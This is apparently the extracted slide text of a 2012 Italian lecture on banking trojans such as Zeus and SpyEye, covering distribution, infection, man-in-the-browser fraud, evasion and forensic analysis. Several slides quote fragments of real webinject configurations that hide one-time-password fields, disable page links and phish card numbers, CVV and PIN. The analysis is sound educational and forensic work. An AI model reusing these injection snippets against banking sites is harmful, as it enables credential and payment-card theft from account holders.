Malware Bancario INTRODUZIONE AL CRIMEWARE NEL SETTORE BANCARIO PRESI NELLA RETE - COLLEGIO GHISLIERI 23 NOVEMBRE 2012 Dott. Francesco Schifilliti COS’È UN BANKING TROJAN? This term refers to the subset of malware seeking to steal/theft data from electronic bank accounts. Within this context, other financial services such as, for instance, online stock exchange operations are also considered electronic banking. 001 Zeus, SpyEye… e tanti altri 002 Soggetti (minimi) Coinvolti 003 Malware Developing 004 Malware Distribution ? User 005 Malware Distribution Pay-per-Install Drive-by-Download Exploit-as-a-Services 006 Ciclo Pay-per-Install Exploit-as-a-Services 007 Fase di Infezione e Controllo Infection Mail di Spam Compromised Web Site Exploit Pack <script var a= var xl if(xls John Doe: Victim Infection 008 Iterando il processo d’Infezione… Flat Botnet P2P Botnet 009 Ciclo d’Infezione di un Malware sul PC Infezione sul Disco Rendere ‘Persistent’ il MW (ad es. SpyEye copia il file C:\cleansweep.ex e) (ad es. con la modifica del registry) Injection Estensione della Injection (generalmente sul processo Explorer) (generalmente con tecniche di Hooking in Userland) Connessione persistente col Server di C&C 010 Odore di $$$ data theft User data & session theft 011 Man in the Browser 012 Anti-Detection/Deception Techniques MW Code Anti Memory Anti Emulation Anti Debugging Anti Disassembler Cryptography Packing & Protecting Obfuscation 013 Struttura di SpyEye C&C Packer Obfuscation Anti-Dbg Plugin del Malware: Binary • • • • P config.dat, ccgrabber collectors, sock5 customconnector webinjectors.txt 014 Un pezzettino di Webinjector di uno SpyEye 10.7 ….. set_url *** GP data_before <body data_end data_inject style="visibility:hidden” data_end data_after id= data_end data_before </body> data_end data_inject <script src='/error.html/trxm1/'></script> <script src='/error.html/trxm1/dbcommon.js'></script> <script src='/error.html/trxm1/dbsepa.js'></script> <script>if (typeof _n_ck == "undefined"){ = 'visible';}</script> data_end data_after </html> data_end ….. 015 Un pezzettino di Webinjector di un ATS ….. set_url ** GP data_before <h1 class="PageTitle">*My Q*</h1> data_end data_inject <script language="javascript" type="text/javascript”> window.onload = function() { for ( i=0; i < document.links.length; i++ ) if (document.links[i].id != 'H_LogOffLink' && document.links[i].id != 'ctl00_HeaderControl_LogOffLink’) document.links[i].onclick = function() { return false; }; }; </script> <script language="javascript" type="text/javascript”> var clck_counter = 0; function msg() { clck_counter++; if (clck_counter==2) { document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden”; document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true; document.getElementById('error') = 42; document.getElementById('error').style.left = 42; document.getElementById('error').style.visibility = "visible”; document.getElementById('error').style.display = "block”; } return false; } 016 Webinject in Chiaro nella RAM*cardSummary*∏‹∏:](ÈÈÈ∏Í∏Í√ <style type="text/css"> #inject { display: none; } .ui-dialog { width: 400px; font-size: 11px; } .ui-dialog .ui-dialog-titlebar-close { visibility: hidden; } .ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; } </style>Pfiıº| ÓΩ|HÓΩ|pÓΩ|òÓ≤ıº|¿ÓΩ|ËÓ∏˘º|Ô˙º|8Ô˙º|`ÔπàÔπ∞Ô∫ÿÔ∫–·∞Ô <script type="text/javascript" src=""></script> value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus(); } else if (jQuery("#inject_expdate_mm").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus(); } else if (jQuery("#inject_expdate_yy").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus(); } else if (jQuery("#inject_cvv").val().length < 3) { alert('Please enter correct CVV'); jQuery("#inject_cvv").focus(); } else if (jQuery("#inject_pin").val().length < 5) { ……. 017 SpyEye: esempio di MW modulare e parametrico Cosa/Come Rubare è definito in base ai Plugin Installati sulla Bot. billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9 bugreport.dll_a6c1992119c1550db437aac86d4ffdad ccgrabber.dll_5b1593855a6e8f01468878eb88be39df creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5 Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2 rdp.dll_0cb722049e024f2366ba9c187cb3929f ddos.dll_716d82810241daa5e2a41327014e9a77 … su Quale Banca/Ist. Finanziario fare operazioni in Frode è definito in webinjectors.txt User a Chi Trasmettere i dati collezionati dal MW è definito in collectors.txt 018 Uno Schema di Riferimento dell’Analisi Forensic Ananlysis Disk Analysis MW Searching Reg. Analysis Browser Analysis Live Analysis MW Analysis File Analysis Hash Comparing De- AntiXYZ Disassebling Debugging Memory Dumping Network Analysis Memory Analysis Entropy Analysis PIENA COMPRENSIONE DEL FORENSIC ARTIFACT 019 GRAZIE Francesco Schifilliti [email protected]